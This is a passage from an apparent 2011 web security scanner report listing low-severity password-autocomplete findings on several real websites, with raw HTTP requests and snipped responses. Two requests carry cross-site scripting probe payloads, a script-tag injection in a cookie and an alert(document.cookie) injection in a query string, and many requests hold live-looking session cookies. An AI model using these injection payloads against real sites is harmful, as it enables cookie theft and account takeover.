Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:11 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 18043


<!-- updateEmailPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="
...[SNIP]...
<!-- End SiteCatalyst code version: H.17. -->
<form action="email-password-submit.do" method="post" name="emailPasswordForm" type="org.apache.struts.validator.DynaValidatorForm">
<input type="hidden" name="redirect" value="" />
...[SNIP]...
<div style="margin-left:183px;padding:5px;">
                       <input type="password" name="password" value="" maxlength="20" size="40" style="width: 160px">
                   </div>
...[SNIP]...
<div style="margin-left:183px;padding:5px;">
                       <input type="password" name="confirmPassword" value="" maxlength="20" size="40" style="width: 160px">
                   </div>
...[SNIP]...

15.3. https://ecommerce.randomhouse.com/account.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /account.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=30BCBB9743BBB87336047B037BF512BF.ecommerce_wrk1; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16859


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!-- End SiteCatalyst code version: H.17. -->
<form action="sign-in-submit.do" method="post" name="signInForm" type="org.apache.struts.validator.DynaValidatorForm">            
<div id="ecom_page_contents">
...[SNIP]...
<span class="ecom_login_field">
                               <input type="password" name="password" value="" size="30" />
                           </span>
...[SNIP]...

15.4. https://ecommerce.randomhouse.com/create-account-submit.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account-submit.do

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /create-account-submit.do HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:47:05 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20778


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
</script>
<form action="create-account-submit.do" method="post" name="createAccountForm" type="org.apache.struts.validator.DynaValidatorForm">
<input type="hidden" name="shippingAddress" value="useBillingAddress" />
...[SNIP]...
<div class="account_data_value">
                   <input type="password" name="password" value="">
                   </div>
...[SNIP]...
<div class="account_data_value">
                   <input type="password" name="confirmPassword" value=""> (min 6 characters)
                   </div>
...[SNIP]...

15.5. https://ecommerce.randomhouse.com/create-account.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account.do

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /create-account.do HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:19:46 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 20193


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
</script>
<form action="create-account-submit.do" method="post" name="createAccountForm" type="org.apache.struts.validator.DynaValidatorForm">
<input type="hidden" name="shippingAddress" value="useBillingAddress" />
...[SNIP]...
<div class="account_data_value">
                   <input type="password" name="password" value="">
                   </div>
...[SNIP]...
<div class="account_data_value">
                   <input type="password" name="confirmPassword" value=""> (min 6 characters)
                   </div>
...[SNIP]...

15.6. https://ecommerce.randomhouse.com/sign-in-submit.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in-submit.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sign-in-submit.do HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:26:47 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 16981


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!-- End SiteCatalyst code version: H.17. -->
<form action="sign-in-submit.do" method="post" name="signInForm" type="org.apache.struts.validator.DynaValidatorForm">            
<div id="ecom_page_contents">
...[SNIP]...
<span class="ecom_login_field">
                               <input type="password" name="password" value="" size="30" />
                           </span>
...[SNIP]...

15.7. https://ecommerce.randomhouse.com/sign-in.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sign-in.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1; SC_LINKS=%5B%5BB%5D%5D; CP=null*; mbox=check#true#1303855669|session#1303855598284-166145#1303857469|PC#1303855598284-166145#1366927609; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Dhttps%25253A//ecommerce.randomhouse.com/sign-in.do%25253Ffrom%25253Drandomhouse%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:44 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16851


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!-- End SiteCatalyst code version: H.17. -->
<form action="sign-in-submit.do" method="post" name="signInForm" type="org.apache.struts.validator.DynaValidatorForm">            
<div id="ecom_page_contents">
...[SNIP]...
<span class="ecom_login_field">
                               <input type="password" name="password" value="" size="30" />
                           </span>
...[SNIP]...

15.8. https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://myaccount.west.thomson.com
Path:   /MyAccount/AccessControl/AccessControl/SignIn

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken= HTTP/1.1
Host: myaccount.west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: MA_ASP.NET_SessionId=wdnkca45qolkzcmo4fjuti55; path=/; HttpOnly
Set-Cookie: .MYACCOUNT=; expires=Tue, 12-Oct-1999 05:00:00 GMT; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24458


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
My Account-West&n
...[SNIP]...
<div style="padding-bottom:.4em;">
<form action="/MYACCOUNT/AccessControl/AccessControl/SignIn" method="post" id="signInForm">
<div>
...[SNIP]...
<span style="float:left;">
<input id="Password" maxlength="70" name="Password" style="width:230px" type="password" /></span>
...[SNIP]...

15.9. http://support.moxiesoft.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.moxiesoft.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.1.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:01:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Tue, 26 Apr 2011 21:01:06 GMT
Set-Cookie: ASPSESSIONIDQABACBCB=NHEPJGDDIMDAFCDMFDDMALJF; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")

...[SNIP]...
<!-- login box starts -->
                                   <form id="frmNewLogin" name="frmNewLogin" method="post" action="login.asp">
                                   <input type="hidden" id="txtProductID" name="txtProductID">
...[SNIP]...
<td width="150"><input type="password" name="txtPasswd" id="txtPasswd" /></td>
...[SNIP]...

15.10. http://www.aac.org/site/TR/Events/AWB08  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aac.org
Path:   /site/TR/Events/AWB08

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 HTTP/1.1
Host: www.aac.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:44:06 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=839fd626r1.app209a; path=/
Content-Type: text/html
Content-Length: 26372

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<base href="http://www.aac.org/site/" />


<title>AIDS Walk Boston, Sunday, June 5, 2011: </title>
<meta http-equiv="C
...[SNIP]...
<td><form id="lLogonForm" name="lLogonForm" action="UserLogin?NEXTURL=TRC?fr_id=1110&amp;pg=center" method="post">

<table style="width: 155px;" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td class="login" width="85"><input id="Password" name="Password" type="password" size="12" maxlength="20" onselect="this.value='';" /></td>
...[SNIP]...

15.11. http://www.bcbst.com/inc/loginform.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /inc/loginform.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /inc/loginform.asp?t=0.5000415733084083 HTTP/1.1
Host: www.bcbst.com
Proxy-Connection: keep-alive
Referer: http://www.bcbst.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:37:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 837
Content-Type: text/html
Cache-control: private
Content-Length: 837


<script>

</script>
<div>
<form name="mainlogon"
       method="post"
       action="/signon/processlogon.do">

   <div class="user">
       <label>User ID:</label>
       <input name="dnqualifier"
           type="text
...[SNIP]...
</label><input name="userpassword" type="password"    id="password" class="text" onKeyPress="return enterSubmit(this.form, event)">
   </div>
...[SNIP]...

15.12. https://www.bcbst.com/inc/loginform.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /inc/loginform.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /inc/loginform.asp?t=0.3263980813790113 HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: https://www.bcbst.com/secure/public/login.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:26:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 837
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD; path=/
Cache-control: private
Content-Length: 837


<script>

</script>
<div>
<form name="mainlogon"
       method="post"
       action="/signon/processlogon.do">

   <div class="user">
       <label>User ID:</label>
       <input name="dnqualifier"
           type="text
...[SNIP]...
</label><input name="userpassword" type="password"    id="password" class="text" onKeyPress="return enterSubmit(this.form, event)">
   </div>
...[SNIP]...

15.13. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;path=/
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:49:09 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...
</a>
       <form name="fbLoginForm" id="fbLoginFormID" action="/login/" method="post" class="genericForm ajaxForm" enctype="multipart/form-data">
           
       <div id="emailFormFieldContainer" class="textformFieldContainer formFieldContainer mandatory">
...[SNIP]...
<span class="inputWrapper">
                           <input type="password" name="password" id="passwordFieldID" class="formpassword " value="**********" onclick="if(this.value=='**********')this.value=''" />
                       </span>
...[SNIP]...

15.14. http://www.freemanco.com/store/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /store/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /store/?from=freemancofb27d'%3balert(document.cookie)//6c9edc3f802 HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; JSESSIONID=A69190F969B4B3882863F4380364FE84.node2; __utmz=95684043.1303850323.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=95684043.1984575328.1303848339.1303848339.1303850323.2; __utmc=95684043; __utmb=95684043.3.10.1303850323

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:59:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 87216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <hea
...[SNIP]...
<div class="loginBox">

               <form action="?_DARGS=/store/.loginTopForm" method="post"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
<td>

                                   <input value="" type="password" title="Your password is case sensitive and must be between 4 and 25 characters long." style="width:142px;" name="/atg/userprofiling/ProfileFormHandler.value.password"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.password">
...[SNIP]...

15.15. https://www.freemanco.com/store/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.freemanco.com
Path:   /store/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /store/index.jsp?_requestid=131058 HTTP/1.1
Host: www.freemanco.com
Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/ourwork/creativeservices/creative.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmc=95684043; __utmb=95684043.2.10.1303848339

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:51:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 87252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <hea
...[SNIP]...
<div class="loginBox">

               <form action="?_DARGS=/store/index.jsp.loginTopForm" method="post"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
<td>

                                   <input value="" type="password" title="Your password is case sensitive and must be between 4 and 25 characters long." style="width:142px;" name="/atg/userprofiling/ProfileFormHandler.value.password"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.password">
...[SNIP]...

15.16. http://www.widgetbox.com/account/login_lite.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.widgetbox.com
Path:   /account/login_lite.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /account/login_lite.jsp HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
